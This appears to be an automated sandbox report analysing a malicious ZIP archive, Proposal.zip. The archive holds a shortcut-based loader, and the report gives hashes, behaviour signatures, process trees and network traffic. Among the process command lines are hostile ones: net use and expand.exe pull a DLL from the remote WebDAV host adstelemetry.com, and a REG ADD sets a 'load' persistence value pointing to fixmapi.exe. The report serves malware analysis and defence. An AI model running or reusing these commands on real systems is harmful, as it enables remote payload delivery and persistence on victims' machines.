File name:

Proposal.zip

Full analysis: https://app.any.run/tasks/6efc9793-a0a3-42f3-8a63-b1339d03751f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 10, 2025, 07:25:48
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
webdav
reflection
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

535973A9DAA0F7ADC4E3248724252778

SHA1:

8F901B64FC57276C7597A95383953B57B6C56A92

SHA256:

F3DA5FA264007B9680CA035357183E2C37C95CB053393700E85D53F7478925A3

SSDEEP:

12288:LOOahzz/Wbn3f0NCESjYPdYsPmZaujuhMdAqbOiQ87:LO1ZzObn3f0NCE8mdYsP+aujuhMRbOiL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6924)
      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 7136)

    • Changes powershell execution policy (Bypass)

      • fixmapi.exe (PID: 5300)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 7136)

    • Downloads the requested resource (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Uses AES cipher (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Dynamically loads an assembly (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • fixmapi.exe (PID: 5300)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 4204)
      • RegAsm.exe (PID: 2132)
      • fixmapi.exe (PID: 5300)

    • Starts POWERSHELL.EXE for commands execution

      • WinRAR.exe (PID: 4204)
      • fixmapi.exe (PID: 5300)

    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 6924)

    • Possibly malicious use of IEX has been detected

      • WinRAR.exe (PID: 4204)

    • Starts NET.EXE to map network drives

      • powershell.exe (PID: 6924)

    • Uses RUNDLL32.EXE to load library

      • svchost.exe (PID: 2084)

    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 6924)

    • Executable content was dropped or overwritten

      • svchost.exe (PID: 2084)
      • expand.exe (PID: 1076)
      • powershell.exe (PID: 6924)
      • fixmapi.exe (PID: 5300)
      • csc.exe (PID: 6560)

    • Abuses WebDav for code execution

      • svchost.exe (PID: 2084)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6924)
      • fixmapi.exe (PID: 5300)

    • The process executes via Task Scheduler

      • fixmapi.exe (PID: 5300)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 6924)

    • Manipulates environment variables

      • powershell.exe (PID: 6924)

    • Uses REG/REGEDIT.EXE to modify registry

      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 7136)
      • cmd.exe (PID: 236)

    • Checks Windows Trust Settings

      • fixmapi.exe (PID: 5300)

    • Gets or sets the security protocol (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Reads Microsoft Outlook installation path

      • fixmapi.exe (PID: 5300)

    • Reads Internet Explorer settings

      • fixmapi.exe (PID: 5300)

    • Starts a new process with hidden mode (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Gets information about processes (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Checks a user's role membership (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Starts CMD.EXE for commands execution

      • fixmapi.exe (PID: 5300)

    • Converts a string into array of characters (POWERSHELL)

      • fixmapi.exe (PID: 5300)

  • INFO

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6924)
      • fixmapi.exe (PID: 5300)

    • Application launched itself

      • AcroCEF.exe (PID: 6296)
      • Acrobat.exe (PID: 4704)
      • msedge.exe (PID: 2600)
      • msedge.exe (PID: 6228)

    • Reads the software policy settings

      • net.exe (PID: 736)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • powershell.exe (PID: 6924)

    • The process uses the downloaded file

      • WinRAR.exe (PID: 4204)
      • RegAsm.exe (PID: 2132)

    • Checks proxy server information

      • net.exe (PID: 736)

    • The sample compiled with english language support

      • powershell.exe (PID: 6924)
      • msedge.exe (PID: 7632)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6924)

    • Checks supported languages

      • expand.exe (PID: 1076)
      • RegAsm.exe (PID: 2132)
      • fixmapi.exe (PID: 5300)

    • Sends debugging messages

      • Acrobat.exe (PID: 5096)

    • Reads the machine GUID from the registry

      • fixmapi.exe (PID: 5300)
      • csc.exe (PID: 6560)

    • Converts byte array into ASCII string (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Reads the computer name

      • fixmapi.exe (PID: 5300)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Creates a byte array (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Uses string split method (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6924)

    • Manual execution by a user

      • msedge.exe (PID: 2600)

    • Create files in a temporary directory

      • fixmapi.exe (PID: 5300)
      • csc.exe (PID: 6560)

    • Executable content was dropped or overwritten

      • msedge.exe (PID: 7632)

    • Uses string replace method (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • fixmapi.exe (PID: 5300)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2025:01:02 05:40:42
ZipCRC: 0xa28b6148
ZipCompressedSize: 328823
ZipUncompressedSize: 342511
ZipFileName: Proposal.lnk
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
249
Monitored processes
113
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe no specs powershell.exe conhost.exe no specs rundll32.exe no specs acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs net.exe svchost.exe acrocef.exe no specs expand.exe msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs fixmapi.exe regasm.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs reg.exe no specs powershell.exe no specs conhost.exe no specs reg.exe no specs msedge.exe no specs msedge.exe no specs csc.exe conhost.exe no specs cvtres.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
236"C:\WINDOWS\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v load /d C:\Windows\Tasks\fixmapi.exe /fC:\Windows\System32\cmd.exefixmapi.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
640"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2908 --field-trial-handle=1624,i,7971632054201257314,1539017436018739815,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
736"C:\WINDOWS\system32\net.exe" use \\adstelemetry.com@SSL@443\hBHcHa\C:\Windows\System32\net.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\mpr.dll
736"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2368 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1044"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --no-appcompat-clear --mojo-platform-channel-handle=5380 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1076"C:\WINDOWS\system32\expand.exe" \\adstelemetry.com@SSL@443\hBHcHa\mapistubx64.dll c:\windows\tasks\mapistub.dllC:\Windows\System32\expand.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
1220"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=2908 --field-trial-handle=1624,i,7971632054201257314,1539017436018739815,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1488"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3200 --field-trial-handle=2204,i,13151857812966353076,3986580673643499751,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1576"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2208 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1580"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5912 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
114 227
Read events
113 940
Write events
272
Delete events
15

Modification events

(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Proposal.zip
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
Executable files
47
Suspicious files
1 310
Text files
244
Unknown types
2

Dropped files

PID
Process
Filename
Type
5096Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTINGbinary
MD5:DC84B0D741E5BEAE8070013ADDCC8C28
SHA256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
6924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SAHRCJXJWLYGK2SYTS4L.tempbinary
MD5:3880E8C032EBC11601995C238979FDF2
SHA256:C0F39E58A3E8EC0FF8FF3F44201DE3A5D3DC39A65FF044BD149693318B53F43C
4204WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb4204.27005\Proposal.lnkbinary
MD5:81E0E395446DF8633E5C0601FF318773
SHA256:2C60D60F2145735F5AB0E082C38D28401DB7D57CCF69970A04DD92AA0FD4A472
5096Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.1.20093.6 2025-01-10 07-26-37-845.logtext
MD5:460C6041966002D8384A18C895A65EB0
SHA256:C83EC6E8FB3EC62481289C033238C1D9B08DB8076EAAD304099FD7A7F594F1B9
6296AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.oldtext
MD5:2EF1F7C0782D1A46974286420D24F629
SHA256:D3A9BB7E09E1F4B0C41FF7808E930DDACF5DB3BACD98ECCF5BC7DB4863D1FCF5
5096Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalbinary
MD5:0E7B12DE3E5E029E95AA9881C11D6680
SHA256:5844D1B01C113743244CF47EDB9A5218E95B8C0A8A5179BA4806AAB9DBAFFFDC
4704Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lstbinary
MD5:366B140BAFC863B7E366AA1E51604759
SHA256:CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E
6296AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old~RF1401f2.TMPtext
MD5:ED7D8AAE48211E2BFAF557130572C62A
SHA256:A5CF8D8ADC86DCA357396AF7E3A24A116072D5C1E5552EEB76601AE2673DED6E
6924powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4ccr0hty.dze.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6296AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.oldtext
MD5:EB1590F2607E1CE46DBF6A521F772EA0
SHA256:4355D9A8A115BA4E41178B456A8A5578846EB1F7EC9509249C2405F758F31731
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
48
TCP/UDP connections
240
DNS requests
209
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
2.23.242.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6216
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7012
svchost.exe
HEAD
200
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1736952449&P2=404&P3=2&P4=Pb5Zry2XpPRn6QnJ9ZCCqf%2ba0zqgQyDggr9DqTnLn64CbSED8EdSsj7Usj3CKkeqs3H5pOsB2QK37Wk9B9gllQ%3d%3d
unknown
whitelisted
5340
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4704
Acrobat.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D
unknown
whitelisted
5340
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7012
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1736952449&P2=404&P3=2&P4=Pb5Zry2XpPRn6QnJ9ZCCqf%2ba0zqgQyDggr9DqTnLn64CbSED8EdSsj7Usj3CKkeqs3H5pOsB2QK37Wk9B9gllQ%3d%3d
unknown
whitelisted
7012
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1736952449&P2=404&P3=2&P4=Pb5Zry2XpPRn6QnJ9ZCCqf%2ba0zqgQyDggr9DqTnLn64CbSED8EdSsj7Usj3CKkeqs3H5pOsB2QK37Wk9B9gllQ%3d%3d
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1488
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
2.23.242.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
2.23.227.221:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
1176
svchost.exe
20.190.159.75:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.72
whitelisted
www.microsoft.com
  • 2.23.242.101
  • 95.101.149.131
whitelisted
google.com
  • 172.217.16.142
whitelisted
www.bing.com
  • 2.23.227.221
  • 2.23.227.208
  • 2.23.227.202
  • 2.23.227.215
  • 104.126.37.137
  • 104.126.37.178
  • 104.126.37.131
  • 104.126.37.185
  • 104.126.37.139
  • 104.126.37.123
  • 104.126.37.144
  • 104.126.37.145
  • 104.126.37.128
  • 104.126.37.163
  • 104.126.37.155
  • 104.126.37.176
  • 104.126.37.170
  • 104.126.37.186
  • 104.126.37.171
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.75
  • 20.190.159.68
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.4
  • 40.126.31.67
  • 20.190.159.73
  • 40.126.31.71
whitelisted
go.microsoft.com
  • 2.23.242.9
whitelisted
